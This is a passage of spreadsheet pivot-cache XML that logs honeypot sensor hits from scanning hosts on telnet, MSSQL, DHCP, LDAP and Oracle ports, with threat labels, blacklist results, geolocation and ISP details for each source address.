    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bea7:1f62"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2496"/>
    <x v="2496"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T05:40:32"/>
    <d v="2025-04-07T20:16:28"/>
    <d v="2025-04-09T05:40:32"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2003-10-27"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:de6b:5c99"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2497"/>
    <x v="2497"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T05:00:49"/>
    <d v="2024-07-09T03:20:00"/>
    <d v="2025-04-09T05:00:49"/>
    <n v="28"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot Blacklisted IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_SMTP_H39"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;25&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b008:c272"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2498"/>
    <x v="2498"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T04:52:36"/>
    <d v="2025-04-09T04:52:36"/>
    <d v="2025-04-09T04:52:36"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="NA"/>
    <s v="Istanbul"/>
    <s v="745044"/>
    <s v="34122"/>
    <s v="41.0082"/>
    <s v="28.9784"/>
    <s v="47331"/>
    <s v="TTNET"/>
    <s v="TurkTelecom"/>
    <s v="consumer"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:51d5:9c04"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2499"/>
    <x v="2499"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T04:47:54"/>
    <d v="2025-04-03T07:02:24"/>
    <d v="2025-04-09T04:47:54"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MG"/>
    <s v="Minas Gerais"/>
    <s v="Patrocínio"/>
    <s v="Patrocínio"/>
    <s v="3454763"/>
    <s v="NA"/>
    <s v="-18.9439"/>
    <s v="-46.9925"/>
    <s v="262595"/>
    <s v="OnNet Telecomunicações LTDA"/>
    <s v="OnNet Telecomunicações LTDA"/>
    <s v="business"/>
    <s v="OnNet Telecomunicacoes LTDA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b36a:11b5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2500"/>
    <x v="2500"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T04:42:47"/>
    <d v="2025-04-09T04:42:47"/>
    <d v="2025-04-09T04:42:47"/>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f:f66c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2501"/>
    <x v="2501"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T04:11:32"/>
    <d v="2025-04-09T04:09:54"/>
    <d v="2025-04-09T04:11:32"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:9f96"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2502"/>
    <x v="2502"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T03:58:10"/>
    <d v="2025-04-09T03:58:10"/>
    <d v="2025-04-09T03:58:10"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bidar"/>
    <s v="Bidar"/>
    <s v="1275738"/>
    <s v="NA"/>
    <s v="17.908"/>
    <s v="77.5152"/>
    <s v="24560"/>
    <s v="AIRTELBROADBAND-AS-AP"/>
    <s v="Bharti Airtel"/>
    <s v="consumer"/>
    <s v="Bharti Airtel Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aac:5305"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2503"/>
    <x v="2503"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T03:19:43"/>
    <d v="2025-04-09T03:19:43"/>
    <d v="2025-04-09T03:19:43"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Chennai"/>
    <s v="1264527"/>
    <s v="600001"/>
    <s v="13.0827"/>
    <s v="80.2707"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:fcbf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2504"/>
    <x v="2504"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T03:12:12"/>
    <d v="2024-07-13T12:46:58"/>
    <d v="2025-04-09T03:12:12"/>
    <n v="39"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_DHCP_H26&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="23&amp;&amp;67&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="62"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Yelahanka"/>
    <s v="1252758"/>
    <s v="NA"/>
    <s v="13.1007"/>
    <s v="77.5963"/>
    <s v="55947"/>
    <s v="Bangalore Broadband Network Pvt Ltd"/>
    <s v="Bangalore Broadband Network Pvt Ltd"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2017-05-08"/>
    <s v="SUNILBL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:675c:67b1"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2505"/>
    <x v="2505"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T03:00:49"/>
    <d v="2025-04-01T07:27:30"/>
    <d v="2025-04-09T03:00:49"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_ORACLE_H30&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1521&amp;&amp;1433&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Rappahannock"/>
    <s v="Washington"/>
    <s v="4792307"/>
    <s v="22747"/>
    <s v="38.7134"/>
    <s v="-78.1591"/>
    <s v="8075"/>
    <s v="Microsoft Corporation"/>
    <s v="Microsoft Corporation"/>
    <s v="business"/>
    <s v="Microsoft Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_ORACLE:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:30d8:f868"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2506"/>
    <x v="2506"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T02:55:05"/>
    <d v="2025-04-09T02:55:05"/>
    <d v="2025-04-09T02:55:05"/>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b:8527"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2507"/>
    <x v="2507"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T02:53:36"/>
    <d v="2025-04-09T02:53:36"/>
    <d v="2025-04-09T02:53:36"/>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e:4d3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2508"/>
    <x v="2508"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T02:42:06"/>
    <d v="2025-04-08T14:45:06"/>
    <d v="2025-04-09T02:42:06"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c1:252d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2509"/>
    <x v="2509"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T02:31:49"/>
    <d v="2025-03-16T12:11:32"/>
    <d v="2025-04-09T02:31:49"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f1:b234"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2510"/>
    <x v="2510"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T02:29:43"/>
    <d v="2025-04-09T01:46:25"/>
    <d v="2025-04-09T02:29:43"/>
    <n v="40"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="AL"/>
    <s v="Albania"/>
    <s v="11"/>
    <s v="Tirana"/>
    <s v="Bashkia Tiranë"/>
    <s v="Tirana"/>
    <s v="3183875"/>
    <s v="1010"/>
    <s v="41.3275"/>
    <s v="19.8187"/>
    <s v="33983"/>
    <s v="ARTMOTION SH.P.K."/>
    <s v="Artmotion Sh.P.K."/>
    <s v="business"/>
    <s v="Artmotion"/>
    <s v="2004-09-21"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5416:23f6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2511"/>
    <x v="2511"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T01:27:07"/>
    <d v="2025-04-09T01:27:07"/>
    <d v="2025-04-09T01:27:07"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7449:3447"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2512"/>
    <x v="2512"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T01:22:53"/>
    <d v="2025-03-29T15:52:26"/>
    <d v="2025-04-09T01:22:53"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_LDAP_HC1"/>
    <s v="389"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="PE"/>
    <s v="Peru"/>
    <s v="LMA"/>
    <s v="Lima Province"/>
    <s v="NA"/>
    <s v="Lima"/>
    <s v="3936456"/>
    <s v="15001"/>
    <s v="-12.0464"/>
    <s v="-77.0428"/>
    <s v="6147"/>
    <s v="Telefonica del Peru S.A.A."/>
    <s v="Telefonica del Peru S.A.A."/>
    <s v="business"/>
    <s v="EL COMERCIO"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_LDAP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c83c:c04"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2513"/>
    <x v="2513"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T01:21:15"/>
    <d v="2025-04-09T01:21:15"/>
    <d v="2025-04-09T01:21:15"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:ddec"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2514"/>
    <x v="2514"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T01:02:32"/>
    <d v="2025-04-09T01:02:32"/>
    <d v="2025-04-09T01:02:32"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (RajajiNagar)"/>
    <s v="1277333"/>
    <s v="560010"/>
    <s v="13.0123"/>
    <s v="77.5558"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Quadgen WiFi Project C/O Addl GM P3 Bangalore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
